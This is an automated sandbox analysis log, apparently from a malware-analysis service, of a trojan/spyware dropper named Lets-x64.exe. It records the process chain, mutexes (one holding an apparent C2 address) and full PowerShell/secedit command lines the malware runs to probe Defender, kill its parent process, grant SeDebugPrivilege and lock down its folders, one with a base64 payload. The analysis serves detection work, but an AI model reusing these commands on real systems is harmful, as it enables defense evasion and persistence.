                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180020C382_2_0000000180020C38
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180034C502_2_0000000180034C50
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018001E4542_2_000000018001E454
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018002649C2_2_000000018002649C
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800214A82_2_00000001800214A8
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018001F5202_2_000000018001F520
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018001ED402_2_000000018001ED40
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018003CD742_2_000000018003CD74
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018002759C2_2_000000018002759C
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180008DC02_2_0000000180008DC0
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800215C42_2_00000001800215C4
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180037DC82_2_0000000180037DC8
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800205D82_2_00000001800205D8
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018002A6002_2_000000018002A600
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800326382_2_0000000180032638
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180028E382_2_0000000180028E38
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800356942_2_0000000180035694
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180027EB02_2_0000000180027EB0
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018002D6C02_2_000000018002D6C0
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180026EEC2_2_0000000180026EEC
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018003D7742_2_000000018003D774
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800347B02_2_00000001800347B0
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180039FD42_2_0000000180039FD4
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018001FFE02_2_000000018001FFE0
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8488B750612_2_00007FF8488B7506
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8488B82B212_2_00007FF8488B82B2
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_0624F69A28_2_0624F69A
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_0624AEE028_2_0624AEE0
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_06252A8128_2_06252A81
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_0625A03E28_2_0625A03E
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_04D1B49F28_2_04D1B49F
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_04D1FC5928_2_04D1FC59
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_04D2304028_2_04D23040
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: String function: 04D1A9DA appears 42 times
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: String function: 04D1A403 appears 94 times
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: String function: 06249E44 appears 95 times
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: String function: 0624A41B appears 46 times
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: String function: 00000001800120F0 appears 66 times
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: String function: 0000000180002960 appears 55 times
                              Source: Lets-x64.exeStatic PE information: invalid certificate
                              Source: Lets-x64.exeBinary or memory string: OriginalFilename vs Lets-x64.exe
                              Source: Lets-x64.exe, 00000000.00000003.2058103435.0000000002F21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename360SkinMgr.exe, vs Lets-x64.exe
                              Source: Lets-x64.exe, 00000000.00000000.2057606418.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename360SkinMgr.exe, vs Lets-x64.exe
                              Source: Lets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Lets-x64.exe
                              Source: Lets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \StringFileInfo\%04x%04x\OriginalFilename vs Lets-x64.exe
                              Source: Lets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SpecialBuildPrivateBuildOriginalFilenameLegalTrademarksLegalCopyrightProductNameInternalNameFileDescriptionCompanyNameProductVersionFileVersion\StringFileInfo\%04x%04x\SpecialBuild\StringFileInfo\%04x%04x\OriginalFilename\StringFileInfo\%04x%04x\Comments\StringFileInfo\%04x%04x\LegalTrademarks\StringFileInfo\%04x%04x\LegalCopyright\StringFileInfo\%04x%04x\ProductName\StringFileInfo\%04x%04x\InternalName\StringFileInfo\%04x%04x\FileDescription\StringFileInfo\%04x%04x\CompanyName" vs Lets-x64.exe
                              Source: Lets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesuf_rt.exeL vs Lets-x64.exe
                              Source: Process Memory Space: powershell.exe PID: 5996, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                              Source: Process Memory Space: powershell.exe PID: 7960, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                              Source: _P18sPbB.exe.2.drStatic PE information: Section: ZLIB complexity 0.9953575721153847
                              Source: _P18sPbB.exe.2.drStatic PE information: Section: ZLIB complexity 0.9967713647959183
                              Source: iusb3mon.exe.17.drStatic PE information: Section: ZLIB complexity 0.9953575721153847
                              Source: iusb3mon.exe.17.drStatic PE information: Section: ZLIB complexity 0.9967713647959183
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@245/106@1/3
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180010AB0 GetLastError,FormatMessageA,2_2_0000000180010AB0
                              Source: C:\Users\user\Desktop\Lets-x64.exeCode function: 0_2_00007FF6688519B4 GetCurrentDirectoryA,GetTempPathA,lstrlenA,lstrcpyA,lstrlenA,lstrcatA,wsprintfA,wsprintfA,DeleteFileA,RemoveDirectoryA,GetFileAttributesA,CreateDirectoryA,lstrcpyA,SetCurrentDirectoryA,lstrcpyA,CreateDirectoryA,SetCurrentDirectoryA,lstrcpyA,lstrlenA,lstrcatA,lstrcpyA,lstrcpyA,lstrcatA,lstrcpyA,lstrcatA,GetDiskFreeSpaceA,lstrcpyA,SetCurrentDirectoryA,0_2_00007FF6688519B4
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: GetModuleFileNameA,wsprintfA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlenA,RegSetValueExA,28_2_06246D6C
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_06245CE6 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,28_2_06245CE6
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_001D2170 Sleep,CoInitializeEx,CoCreateInstance,CoUninitialize,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,SysFreeString,CoUninitialize,CoUninitialize,SysFreeString,SysAllocString,VariantInit,VariantInit,VariantInit,SysFreeString,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,_com_issue_error,MessageBoxA,28_2_001D2170
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_062467CC shellex,SetThreadExecutionState,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,WinExec,WinExec,WinExec,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WSAStartup,socket,GetCurrentThreadId,htons,inet_addr,connect,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,GetModuleFileNameA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,ExitProcess,StartServiceCtrlDispatcherA,Sleep,GetModuleFileNameA,CopyFileA,Sleep,28_2_062467CC
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_062467CC shellex,SetThreadExecutionState,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,WinExec,WinExec,WinExec,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WSAStartup,socket,GetCurrentThreadId,htons,inet_addr,connect,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,GetModuleFileNameA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,ExitProcess,StartServiceCtrlDispatcherA,Sleep,GetModuleFileNameA,CopyFileA,Sleep,28_2_062467CC
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile created: C:\Program Files\product1\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile created: C:\Users\Public\Documents\dtw_H3NyEy\Jump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1524:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1864:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeMutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3112:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4024:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4748:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2296:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2892:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2604:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3360:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2956:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_03
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeMutant created: \Sessions\1\BaseNamedObjects\202.79.169.178:25445:
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5312:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_03
                              Source: C:\Users\user\Desktop\Lets-x64.exeFile created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0Jump to behavior
                              Source: Lets-x64.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select ParentProcessId from Win32_Process where ProcessId=320
                              Source: C:\Users\user\Desktop\Lets-x64.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                              Source: Lets-x64.exeReversingLabs: Detection: 13%
                              Source: Lets-x64.exeVirustotal: Detection: 13%
                              Source: iusb3mon.exeString found in binary or memory: lable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdl
                              Source: iusb3mon.exeString found in binary or memory: lable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdl
                              Source: iusb3mon.exeString found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAva
                              Source: iusb3mon.exeString found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAva
                              Source: C:\Users\user\Desktop\Lets-x64.exeFile read: C:\Users\user\Desktop\Lets-x64.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\Lets-x64.exe "C:\Users\user\Desktop\Lets-x64.exe"
                              Source: C:\Users\user\Desktop\Lets-x64.exeProcess created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5664114 "__IRAFN:C:\Users\user\Desktop\Lets-x64.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=320').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
